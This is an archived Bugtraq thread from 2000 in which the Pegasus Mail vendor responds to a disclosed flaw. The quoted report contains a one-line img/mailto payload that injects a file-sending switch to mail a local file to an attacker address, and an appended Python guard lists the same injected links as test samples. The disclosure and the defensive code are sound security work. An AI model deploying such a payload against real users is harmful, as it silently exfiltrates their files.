Bugtraq mailing list archives
Re: Pegasus mail file reading vulnerability (fwd)
From: Richard Stevenson <richard.stevenson () TEAM XTRA CO NZ>
Date: Wed, 4 Oct 2000 14:00:15 +1300
Hi Aleph1

My apologies for this... I'm not subscribed to Bugtraq at present, but this is Pegasus Mail Central's response to the threat publicised on BugTraq recently, so it'll have to go through the moderator.

Regards
Richard

--
Richard Stevenson                    | Help Microsoft stamp out software
Systems Support Specialist           | piracy: install Linux today!
richard.stevenson () team xtra co nz |
Phone +64 9 355 5231                 | <http://www.linux.org>
Mobile +64 25 2903101                |

---------- Forwarded message ----------
From: David Harris <David.Harris () pmail gen nz>
To: Imran Ghory <ImranG () BTINTERNET COM>
Date: Wed, 4 Oct 2000 13:54:02 +1300
X-Mailer: Pegasus Mail for Win32 (v4.0, pre-alpha)
Cc: Mark Borrie <mark () gandalf otago ac nz>, Richard.Stevenson () team xtra co nz
Subject: Re: Pegasus mail file reading vulnerability

Mr Ghory has posted an announcement of a potential security hole in Pegasus Mail, the text for which appears at the end of this message.

Well, I'm the vendor. It's a shame Mr Ghory didn't give us a chance to prepare for the wave of panic, dismay and inundation of mail that a posting like this always provokes, but never mind.

Firstly, I'll do the responsible thing and admit that as far as I can tell, this exploit is feasible. It takes advantage of the fact that Pegasus Mail has a commandline interface that can be invoked from within a web browser. Please note that the URL as presented in the report will not work correctly on the majority of systems - Pegasus Mail requires the formal RFC1738 syntax for URLs containing spaces. But if properly represented, it could produce the described effect.

My assessment of the risk involved in this exploit is that it is moderate at worst. The hacker would need to have exact knowledge of the layout of the victim's system, and would need to find some way of enticing the victim to read a page containing the specific link needed to activate the exploit.
Furthermore, even if Pegasus Mail is running, there will almost always be telltale indications to the user that something has happened.

It is worth stressing that this vulnerability exists only in the case of links activated from a web browser - Pegasus Mail already deals with internal mail-based linkages like this.

It is my belief that this exploit may have counterparts in other mail programs. I suspect that any mail program that has a method for being invoked from a browser may potentially have a vulnerability along these lines. I say this not to produce FUD, but in the hope that other developers will examine their code and satisfy themselves that they are not at risk from this kind of exploit.

We currently have a replacement component in development which handles the link between the browser and Pegasus Mail: this component was developed primarily to deal with other non-security-related problems, but I will add some code to it to detect links that send files (something that should never happen in normal use) and release it publicly as soon as is humanly possible.

I am not subscribed to BugTraq (I probably should be) - so I am asking my spokesman on the list, Richard Stevenson, to post this reaction to the list on my behalf (thanks Richard!).

I would thank Mr Ghory for bringing this to our attention, but he hasn't done so yet.

Cheers!

-- David --
Author/Owner, Pegasus Mail System.

------------- Original report follows -------------------------

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the user's hard drive.
DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5, Pegasus Mail will automatically create a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and queue it ready to be sent without any further user intervention. If instead of "hacker () hakersite com" we have a local user, "hacker", the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker () hakersite com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser. This is not a complete solution as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticeable to the user.

Vendor: As I earlier posted a message to vuln-dev giving the basics of this exploit without realizing the consequences (at that stage the user had to click on a link for the exploit to come into play), I have decided to publish the full exploit before contacting the vendor.

------------------ David Harris -+- Pegasus Mail ----------------------
Box 5451, Dunedin, New Zealand   | e-mail: David.Harris () pmail gen nz
Phone: +64 3 453-6880            | Fax: +64 3 453-6612
Thought for the day:
  Book (n): a utensil used to pass time while waiting for the TV repairman.
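A guard for the browser-to-mail-client hand-off that David Harris says the replacement component will get, as an added example (Python, not Pegasus Mail's or the reporter's code): it splits a mailto: link structurally before percent-decoding it, as RFC 1738 requires, and rejects any address item that contains whitespace or starts with a switch, which is exactly the shape of the -F file-sending form in the report. The regex, the allowed header fields and the sample links are assumptions constructed for the example.

```python
"""Vet a mailto: link before it reaches a mail client's command line. Added example,
not Pegasus Mail's code: allow addresses and RFC 2368 header fields, nothing else."""
import re
from urllib.parse import unquote

# Simplified addr-spec; assumption: strict enough for a guard, not full RFC 822.
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
ALLOWED_FIELDS = {"subject", "body", "cc", "bcc"}  # RFC 2368 header names

def _check_addrs(addr_list):
    """Return None if every comma-separated item is a plain address, else a reason."""
    for raw in addr_list.split(","):
        addr = unquote(raw)  # decode per item, only after the structural split
        if addr == "":
            continue
        if any(ch.isspace() for ch in addr):
            return f"whitespace in {addr!r}: would become extra command-line arguments"
        if addr.startswith("-"):
            return f"switch-like item {addr!r}"
        if not ADDR_RE.match(addr):
            return f"not an addr-spec: {addr!r}"
    return None

def check_mailto(url):
    """Return (ok, reason); ok is True only for an addresses-plus-headers link."""
    if not url.lower().startswith("mailto:"):
        return False, "not a mailto: URL"
    addr_part, _, query = url[len("mailto:"):].partition("?")
    reason = _check_addrs(addr_part)
    if reason:
        return False, reason
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        key = key.lower()
        if key not in ALLOWED_FIELDS:
            return False, f"unexpected header field {key!r}"
        if key in ("cc", "bcc"):
            reason = _check_addrs(value)
            if reason:
                return False, reason
    return True, "ok"

SAMPLES = [  # constructed links with placeholder addresses, not from the report
    "mailto:alice@example.com",
    "mailto:alice@example.com?subject=Hello%20there&cc=bob@example.com",
    "mailto:alice@example.com%20-F%20c:\\test.txt",  # spaces in RFC 1738 form
    "mailto:alice@example.com -F c:\\test.txt",      # raw form as in the report
    "mailto:-F",
]
```

The guard reports why a link was refused, which is the "telltale indication" a user or a log reviewer would want to see rather than a silently queued message.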